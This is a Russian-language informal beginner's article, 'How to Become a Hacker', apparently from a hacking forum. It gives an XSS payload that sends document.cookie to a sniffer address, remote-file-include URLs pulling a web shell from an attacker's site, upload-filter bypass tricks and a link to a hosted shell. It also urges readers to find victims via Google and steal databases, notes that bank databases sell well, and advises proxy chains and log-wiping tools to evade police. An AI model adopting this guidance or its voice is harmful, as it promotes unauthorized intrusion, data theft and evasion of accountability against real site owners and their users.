Как стать хакером
Глава №1: С чего начать?
Прежде
чем начнём давай условимся, что я не буду расказывать тебе как
проводить инъекции, искать и реализовывать xss и прочую лабуду ( нет,
ну конечно некоторые аспекты не повредят юному мозгу), я просто
наставлю тебя на путь истинный. Итак, начнём! Как выбрать OS? Многие
говорят, что хакеры сидят только под UNIX, не верь,большинство авторов
этих лживых постов ютят у себя на винте ВЫНЬ. Операционная система
должна соответствовать твоим требованиям. Только не надо сейчас бежать
в магазин за диском со свежайшим дистрибутивом пингвина( LINUX ) или
демона( FreeBSD ) или фуги (OpenBSD ). OS UNIX очень сложна. Конечно
нынешние дистрибутивы UNIX похожи на окна, но всё же. Килобайты команд
надо держать у себя в голове и постоянно долбить по клавишам,
одновременно смотря на чёрный как моя кошка терминал! Тебе это надо?
Спорю на что угодно, что за первый день своего пребывания в Unix ты не
сможешь подключить интернет! А в винде всё просто! И только истинные
ламеры где то услышав громкие лозунги тупо выкрикивают, что Винда самая
глючная система в мире, что его заколебали вирусы и ошибки. Нет
респекта этим людям, не потому, что они выбирают ЛИНУКС, а потому, что
они повторяют эту бессмыслицу. Вот главное отличие хакера, он должен
быть уникален по своему, у каждого должна быть своя феня. Кстати у меня
очень редко виснет Винда, а последний вирус я не помню когда поймал! В
Винде очень много программ. Это отличная среда разработки, хотя
некоторые языки зарождались в недрах линукс. В вопросах с безопасностью
конечно рулят Никсы. Нет, ну конечно же там есть вирусы, но их очень
мало. Почему? Потому, что нету смысла.С правами nobody ты вряд ли,
что-нибудь сделаешь.Конечно же есть некоторые способы получения
привелегий на тачке, разумеется через дыры в продуктах (нет,не в
продуктах питания, а в самой системе и прогах.Кстати в сыре тоже есть
дыры, а в бублике вообще огромная дыра, но вряд ли её когда нибудь
залатают):). Ну а если хочешь убить двух зайцев сразу советую
испоьзовать виртуальные машины, н-р: VMWare, virtual PC от M$. Но
помни, если погонишься за двумя зайцами сразу получишь люлей от
лесника. Поставленная виртуалка будет жутко тормозить даже на
нормальной тачке. Кстать Веб Мани под VMWare не пашутЪ ( об этом
отдельная статья взятаю у Криса Касперски, о том как WebMoney Keeper
Classic выдаёт очень много инфы в сеть, может стать даже трояном с
которым ты подписал лицензионое соглашение:)!
Глава №2: Весьма
странный вопрос я считаю:" какие языки нужно учить, чтобы стать
хакером?". Отвечаю:" какие языки нужно учить чтобы стать хакером я не
знаю, но хорошие разумеется перечислю со всеми их возможностями:
C,C#,C++ - это супермощная среда разработки под все платформы,
эксплойты пишутся чаще на них, ООП это круто. (об эксплойтах мы
поговорим позже ) , Visual Basic - самый медленный после Java язык, но
чаще всего на нём пишуться вирусы, Java - я не уверен, что тебе это
надо, Delphi,Pascal - мощная среда для разработки программ, маленьких и
быстрых, кто-то говорит, что маленьких программ на Дельфине не бывает
тот не прав, сейчас Дельфи единственный конкурирующий с C++,C язык (
хотя мы с тобой знаем, что С++ лучше ), Assembler - О, да, АSM - это
тяжёлая артилерия для всего угодно ( сплойтов, программ, вирусов ),
Perl - непохой язык, появилось множество уязвимостей в скриптах из-за
ошибок разработчиков, PHP - схожий по синтаксису с СИ язык, идеально
подходит для многих целей ( Для разработки под ВЕБ) н-р: скрипты,
эксплойты, работа с БД, рисование и т.д., SQL - очень нужен в нашей
профессии для того чтобы составлять запросы к мускулу для выуживания БД
(баз данных) ( учить весь язык замучаешься, лучше почитать парочку
статей по основным запросам ). Здесь я не привёл ещё много языков
которые устарели или не актуальны ( н-р: JavaScript ну на кой он тебе
нужен, чтобы куки выуживать?, Lisp, Ada )!
Глава №3: Категории атак. Идём всё ближе к цели! 1.
XSS - наверное все слышали про Cross Site Scripting ( помоему
переводится как "внедрение кодав страницу" ). Что можно поднять с
помошью Xss спросишь ты? Поднять можно куки (cookie - печенье). Зачем
они нужны? С помощью кукисов ты идентифицируешься на сайте, т.е. в них
хранится инфа о пользователе для сайта. Куки передаются методами POST
and GET. Xss бывают активные, пассивные, полуактивные, нестандартные. В
этой главе мы рассмотрим только нестандартные и простые X$$!
document.images[0].src="http://адрес снифера/s.gif"+document.cookieПростые - это что-то типа этого ""(писать без кавычек) Но не всегда присутствует эта уязвимость на сайтах. Есть ещё несколько подводных камней - это фильтрация символов, alert(document.cookie)браузер жертвы, интелект админа! Н-р: я однажды нашёл одну xss-ky , вбиваю и мне выплёвывают мои куки ( это было в IE 6 ), захожу в Opera 8 нифига не пашет! Фильтрация это вообще неприятная вешь, парсеры фильтруют знаки такие как (< >,/,+,|,пробел,$,',",; иногда () ). Вот сим-таблица - Сим ; / ? : @ = & < > " # Код %3b %2f %3f %3a %40 %3d %26 %3c %3e %22 %23 Сим { } | \ ^ ~ [ ] ` % ' Код %7b %7d %7c %5c %5e %7e %5b %5d %60 %25 %27
2. SQL-Injection - самый популярный вид атаки о котором все слышали. Вы спросите почему Скуль- ИНЪЕКЦИЯ. Инъекция
- это внедрение препарата во что-нибудь, также и здесь, мы внедряем
запросы в базу и получаем что хотим. Об инъекциях ты можешЪ почитать в
соседней статье. Но вообще БД это лакомый кусок для хакера, в конце
концов их можно продать. Очень высоко ценятся банковские базы, базы
онлайн обменников. Вы спросите для чего они нужны покупателям - это же
элементарно, в них хранятся мэйлы, логины, пароли, адреса, аськи,
телефоны, пин-коды. Но насчёт паролей обольщаться не стоит, в большинстве случаев они зашифрованы (нет не симкой:). 3. Google Hack - это поиск уязвимостей через самый крутой поисковик в мире - GOOGLE.COM,RU,KZ:)! Подробнее прочитай мою статью про Google Hack! 4.DDoS - наверное ты не раз мечтал положить сайт неприятеля Васи Пупкина, чтобы тот очнулся только через дней пять. ДДоС - это отправка пакетов на сайт ( то есть флужения ). Для организации ДДоС-а у тебя должна быть своя бот-сеть. Бот-сеть образуется из компов захваченных тобою и находящихся под твоим надзором - своеобразные зомби. Без бот сети, у тебя вряд ли что получится. 5. Include - способ хороший, но не всегда прёт. Способ банально прост, благоаря ошбкам програмиста у тебя появляется шанс залить свой файл на сервант (сервер). Вот некоторые примеры - http://la-la.fuck/index.pl?file="http://your_site/shell.php,txt,pl"(ага) la-la.ru/lox.pl?open="/index.html,pl,php" Хитрости: например хитрые администраторы ставят редиректы ( перенаправление на другую страницу ) Н-р: http://site1/link.php?u=la-la.ru - вот редирект С помощью этого бага можно провернуть и Xss и Include. Н-р: http://site1/link.php?u=%0A%0A%3Cscri pt%3Ealert(document.cookie)%3C http://site1/link.php?u=http://la-la.ru/shell - без указания расширения, а то парсер запалит.
Ещё
есть такой прикол как обход фильтра по расширению. Бывает что на сервер
позволяют залить некий файл, картинку, без разницы, но с особым
разрешением GIF,JPG и т.д. Бывает, что фильтрации вообще нет:). А если
есть? Тогда методы наши будут хитрее. Мы сменим разрешение так
"myfile.jpg.php", хотя я сомневаюсь, что данный метод будет работать,
потому-что парсеры стали намного умнее. Ты конечно понял, что никаких
картинок мы качать не будем, а зальём полноценный веб шелл или ещё
какую-нибудь штучку. Шелл лучше брать от ныне закрывшейся или
переехавшей ныне команды RST. По крайней мере rst.void.ru больше нету,
а жалко, клёвая была группа, а какие эксплойты, загляденье. Но взять
очень клёвый шелл можно по адресу с моего сайта
scooterstar.narod.ru/shell.txt (расширение txt можно убрать:). Там
кроме этого ничего нет, не бойся это не вирус, а если антивирус будет
на него ругаться не бойся, вирусов с расширением txt я ещё не видел.
Кстати, ты спросишь как шелл запустится на сервере? Отвечаю:" Он
написан на языке перл, перл - это интерпритатор ( так вроде:), эксплойт
запустится сам, только укажи путь к интерпритатору, н-р: !usr/bin/perl,
в Выне адрес и perl.exe. 7.Бруфорс - брутфорс (от лат. "Грубая сила") это банальный подбор паролей по словарюк различным сервисам, не ко всем. Хорошие брутфорсы - это Brutus или THC Hydra for Windows and UNIX. 8.ICQ Hacking - тебе никогда не хотелось иметь красивый номерок Аськи ( я думаю ты знаешь, что это )? Вот
мне лично нет. Но тебя я посвящу. У меня было пара шестизнаков, но их
потом вернули обратно и владельцам. Ирония судьбы, но это так. Лучший
способ получить красивый UIN - это купить его, а что, пусть дорого, но
законно. Ладно если у тебя нету лишних маней гляди сюда. Второй лучший
способ после купли аськи - это брут асек. Третий способ, на многих форумах или сайтах делают конкурсы, победителю - аська. Продвинутый гигант по ICQ
Hacking это софтина ICQ Tools! Точно не знаю где её взять, но точно
помню, что с её помощью я заполучил свой первый шестизнак. Другой, более грубый способ - это взлом Шопов барыгующих UIN-ами с помощью способов приветённых выше или ниже. 9.Протроянивание, впаривание вирусов - способ ужасно грубый, так что мы его рассматривать не будем. Думаю
многие из нас ловили вирусы! Мне за компьютер обидно, он ведь по своему
тоже живой:) Вот тебе понравится если в твою задницу засунут червяка:)
Я уже про BackDoor (тайная лазейка) не говорю:) 10.Си - нет это не C#, C++(forever),C - это социальная инженерия, способность манипулировать людьми. СИ
в сети заниматься значительно легче чем в реале. Почему? Глупый вопрос,
в интернете жертва не слышит твой голос не видит твоего лица, не знает
сколько тебе лет. Разговор по той же Аське значительно легче, чем в
реальной жизни, согласись. Например Кевин Митник прекрасно владел СИ и
постоянно дурил крупные компании. Ты конечно же наслышан про Митника. 11.Кидалово
- во преки всем матам в мою сторону я считаю, что кидалово тоже вид
хаКа. Ведь там задействована СИ и много других аспектов. Сам я не
кидала, не подумай чего. Есть падонки которые кидают нормальных людей
на очень большие деньги, н-р: Джакс, если хочешь глянуть не в
списке кидал ли твой партнёр глянь на kidala.info. Обычно конечно
кидают лохов, которые в первый раз сели за компьютер. 12. Взлом
мэйла - самый помоему желанный метод для многих новичков. Есть
несколько способов вхлома мэйла - это брутфорс (в интернете полно
программ для взлома ящиков под разные OS). Сейчас мы прошли
некоторые аспекты, хотя не все, следовало бы обратиться к вардрайвингу,
крэкингу, фрикингу, кардингу, NetWork Hacking, Kernel Hack, разное
прикольное западло и ещё много-много всего. Позже я обязательно об этом
напишу. Статья ещё не закончилась, так что читай дальше. Deface - очень прикольная вешь. С дефейса практически ничего нельзя поднять кроме мести админу сайта. В
чём суть дефейса? Ты находишь уязвимость в сайте или получаешь доступ к
админке и заливаешь на главную страницу картинку или прикольный текст
(что хочешь), можно вообще стереть index.html, php,pl. Вообще вешь прикольная, только сдесь надо знать либо html либо JavaScript.
Глава №4: Безопасность. Ты думаешь, что за взломы тебе ничего не светит? Ошибаешься, глянь на Митника, МакКиннона. Митнику хотели приписать 300 лет тюрьмы, а МакКиннону присваивают 60:) Что главное для хакера, правильно - Анонимность в сети. Рассмотрим некоторые из них. Proxy
- крайне небезопасный способ в последнее время. Почему? Да потому, что
я на 80% уверен, что ты пользуешься халявными проксиками, а многие из
них как извесно находятся под наблюдением правоохранительных органов
или мертвы. Лучше пользоваться цепочкой прокси, так надёжнее и выгоднее. VpN - дороговатое удовольсвие но весьма эффективное. Это сервер почти полностью отданый под твоё распоряжение. Анонимайзеры
- признаюсь честно, я им не доверяю, очень тормознуто работают, если
хочешь попробовать гляди у SpiderWebb-a в личке сайт или в
google.ru(forever). Некоторые советы: храни файлы и запускай
брутфорсы и прочую лабуду на webshell-ах. Н-р: www.freeshell.org -
крайне хороший сервис регистрация через telnet, ОСъ NetBSD 4.0, море
утилит, срок действия шелла 90 дней. Веб шелл это своеобразный VPN, хранилище файлов, безопасный запуск программ и анонимная закачка шеллов.
Регулярно чисти History и кэш в браузере. Чисти логи с помошью утилиты Vanish (под Линукс). Установи
нормальный firewall and antivirus, хоть ты и начинающий хакер, но тебе
не понравится если к тебе червяки полезут. На брандмауэр Винды не
обращай внимание, он ничего не умеет, кроме как блокировка,
разблокировка программ и игрушек, которые приходится каждый день
разблокировывать. (прикольная скороговорка:)
Глава №5:
Литература - очень знойный вопрос для всех. Вы думаете, что прочитав
книжку от неизвестного автора - "Как стать хакером" всему научитесь и
будете взламывать серверы NASA and FBI. Ещё чего, если бы всё было так,
то от их серваков не осталось бы даже пепла:) Помни, что авторы таких
книжек зарабатывают на названии. Доказано, что 70% покупателей книжек
смотрят на название, а не на содержание текста. Тем самым становится
всё выгоднее писателям, которые выбрали этот брэнд. Насчёт языков
програмирования безспорно рулят Буки (books - книги). Плюс неплохо бы
тебе хорошо освоить винду. Да, я знаю что ты уже познал все окна и тебе
это не нужно. Ошибаешься, несмотря на свою простоту, разобраться с
Виндой подчас сложновато. Особенно с некоторыми встроенными прогами. Разве
ты не мечтал написать СВОЙ убийственный вирус или эксплойт под новую
Висту. Познай ядро, реестр и ещё туеву хучу модулей, узнай как внедрять
код в процессы, ну конечно нужно знать
Ассемблер+Visual_Basic+C#,C+модули_ под_них+Библиотеки и т.д. Короче,
на начальном этапе тебе нечего забивать голову всякой фигнёй, как
например "Библия хакера 2" ( не первая, первая от Криса Касперски
обалденная вещь ). Книга была актуальна года четыре назад. Читай статьи от авторитетных хакеров Крис Касперски, ЗАРАЗА, Terabyte, Coban2k ( автор Пинча ). Так же не забывай почитывать свежие статейки на форуме и bugtrack-rss-лентах hackzone.ru, спрашивай совета от мемберов хакзоны, не стесняйся, мы злые только тогда, если поступают тупые вопросы н-р:
если можно, взломайте тот-то сайт, пожалуйста. Помни друг, что спасибо
в карман не положишь, на хлеб не намажешь и пива "Пожалуйста" нет. Но
ты же не такой как все ( смотри первую главу ). Совет: никогда не
читай журнал "Хакер"(почему? Не читай и всё! Это журнал не от истинных
хакеров, все статьи там пишутся за деньги, поэтому не могут быть
правдивыми или хорошими, единственные кого я уважаю в "Хакере" - это
Даня Шеповалов(ныне работающий в журнале про звёзд Bravo), Gorlum - его
статьи про С++ меня часто выручали, Крис Касперски - обалденный эксперт
знающий очень много про Юникс и Виндовс, знает очень много языков
програмирования.). Совет 2: Читай истинно хакерские E-zine н-р: xaoc, Defaced, Xakery Ezine, Codepimps, Mazafaka, Infected Voice. Не ленись узнавай аськи у мемберов hackzone.ru, только слишком не приставай, а то пустят в игнор.
Главу Style, Soft я пропущу так как выбирать софт и свой стиль только тебе ( первая глава ).
Глава №6: Объекты для атаки. Так, прочитав эту статью ты наверное будешь думать, что-бы взломать. СОВЕТ: Попробуй обратиться к google.ru (глянь в статье GOOGLE Hack) поищи жертв и потренируйся. Тырани пару баз. Только не забывай об анонимности, не редко спец службы ставят западню на таких сайтах.
Кстати, я тебе не объяснил, что такое эксплойт (сплойт) - эксплойт это прога (скрипт), написанный чаще всего на C++(forever), помогающая
получить доступ на тачку. Разумеется, под отдельные версии ОСИ или
Программ отдельные эксплойты, потому что баги латают( придумывают
патчи(заплатки) ).
Ну че испугались??? Ха-ха))) Лучше быть обычным юзером;) Зачем вам этот хакинг???
|